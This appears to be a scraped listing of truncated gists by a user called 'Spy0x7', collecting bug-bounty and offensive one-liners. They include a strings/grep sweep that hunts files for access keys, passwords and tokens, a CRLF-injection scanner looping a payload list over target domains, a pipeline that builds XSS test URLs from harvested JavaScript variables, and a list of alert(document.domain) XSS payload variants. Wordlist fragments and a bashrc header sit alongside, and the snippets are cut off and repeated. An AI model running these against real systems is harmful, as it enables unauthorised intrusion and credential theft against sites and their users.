Spy0x7

strings -f -e s * | grep -i 'BROWSER_STACK_ACCESS_KEY=\|BROWSER_STACK_USERNAME=\|browserConnectionEnabled=\|BROWSERSTACK_ACCESS_KEY=\|CHROME_CLIENT_SECRET=\|CHROME_EXTENSION_ID=\|CHROME_REFRESH_TOKEN=\|CI_DEPLOY_PASSWORD=\|CI_DEPLOY_USER=\|CLOUDAMQP_URL=\|CLOUDANT_APPLIANCE_DATABASE=\|CLOUDANT_ARCHIVED_DATABASE=\|CLOUDANT_AUDITED_DATABASE=\|CLOUDANT_ORDER_DATABASE=\|CLOUDANT_PARSED_DATABASE=\|CLOUDANT_PASSWORD=\|CLOUDANT_PROCESSED_DATABASE=\|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN=\|CONTENTFUL_TEST_ORG_CMA_TOKEN=\|CONTENTFUL_V2_ACCESS_TOKEN=\|-DSELION_BROWSER_RUN_HEADLESS=\|-DSELION_DOWNLOAD_DEPENDENCIES=\|-DSELION_SELENIUM_RUN_LOCALLY=\|ELASTICSEARCH_PASSWORD=\|ELASTICSEARCH_USERNAME=\|EMAIL_NOTIFICATION=\|ENCRYPTION_PASSWORD=\|END_USER_PASSWORD=\|FBTOOLS_TARGET_PROJECT=\|FDfLgJkS3bKAdAU24AS5X8lmHUJB94=\|FEEDBACK_EMAIL_RECIPIENT=\|FEEDBACK_EMAIL_SENDER=\|FIREBASE_PROJECT_DEVELOP=\|FIREBASE_PROJECT_ID=\|FIREBASE_PROJECT=\|FIREBASE_SERVICE_ACCOUNT=\|FIREBASE_TOKEN=\|GH_NAME=\|GH_NEXT_OAUTH_CLIENT_ID=\|GH_NEXT_OAU

Spy0x7

0
1
11
12
13
14
15
16
17
2

Spy0x7

strings -f -e s * | grep -i 'BROWSER_STACK_ACCESS_KEY=\|BROWSER_STACK_USERNAME=\|browserConnectionEnabled=\|BROWSERSTACK_ACCESS_KEY=\|CHROME_CLIENT_SECRET=\|CHROME_EXTENSION_ID=\|CHROME_REFRESH_TOKEN=\|CI_DEPLOY_PASSWORD=\|CI_DEPLOY_USER=\|CLOUDAMQP_URL=\|CLOUDANT_APPLIANCE_DATABASE=\|CLOUDANT_ARCHIVED_DATABASE=\|CLOUDANT_AUDITED_DATABASE=\|CLOUDANT_ORDER_DATABASE=\|CLOUDANT_PARSED_DATABASE=\|CLOUDANT_PASSWORD=\|CLOUDANT_PROCESSED_DATABASE=\|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN=\|CONTENTFUL_TEST_ORG_CMA_TOKEN=\|CONTENTFUL_V2_ACCESS_TOKEN=\|-DSELION_BROWSER_RUN_HEADLESS=\|-DSELION_DOWNLOAD_DEPENDENCIES=\|-DSELION_SELENIUM_RUN_LOCALLY=\|ELASTICSEARCH_PASSWORD=\|ELASTICSEARCH_USERNAME=\|EMAIL_NOTIFICATION=\|ENCRYPTION_PASSWORD=\|END_USER_PASSWORD=\|FBTOOLS_TARGET_PROJECT=\|FDfLgJkS3bKAdAU24AS5X8lmHUJB94=\|FEEDBACK_EMAIL_RECIPIENT=\|FEEDBACK_EMAIL_SENDER=\|FIREBASE_PROJECT_DEVELOP=\|FIREBASE_PROJECT_ID=\|FIREBASE_PROJECT=\|FIREBASE_SERVICE_ACCOUNT=\|FIREBASE_TOKEN=\|GH_NAME=\|GH_NEXT_OAUTH_CLIENT_ID=\|GH_NEXT_OAU

Spy0x7

assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

Spy0x7

input='domain.txt';while IFS= read -r targets; do cat /lists/crlf_payloads.txt|xargs -I % sh -c "curl  -vs --max-time 9 $targets/% 2>&1 |grep -q '< Set-Cookie: ?crlf'&& echo $targets 'vulnerable with payload as'%>>crlf_results.txt||echo 'not vulnerable' $targets";done<$input

Spy0x7

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

Spy0x7

for ip in $(cat domains);do dig asxf $ip | grep CNAME;done

Spy0x7

// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:

// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);

Spy0x7

0
00
01
02
03
1
1.0
10
100
1000

Spy0x7

#--------------------------------------------------------------------------------------------
# if found on gist use `git clone https://gist.github.com/650d59476b86fbe885e66af953099006.git .`
# this is a modified version of Emmanuel Rouat [no-email] bashrc how to which can be found at
# `http://tldp.org/LDP/abs/html/sample-bashrc.html`
#--------------------------------------------------------------------------------------------

# If not running interactively, don't do anything
[ -z "$PS1" ] && return

#-------------------------------------------------------------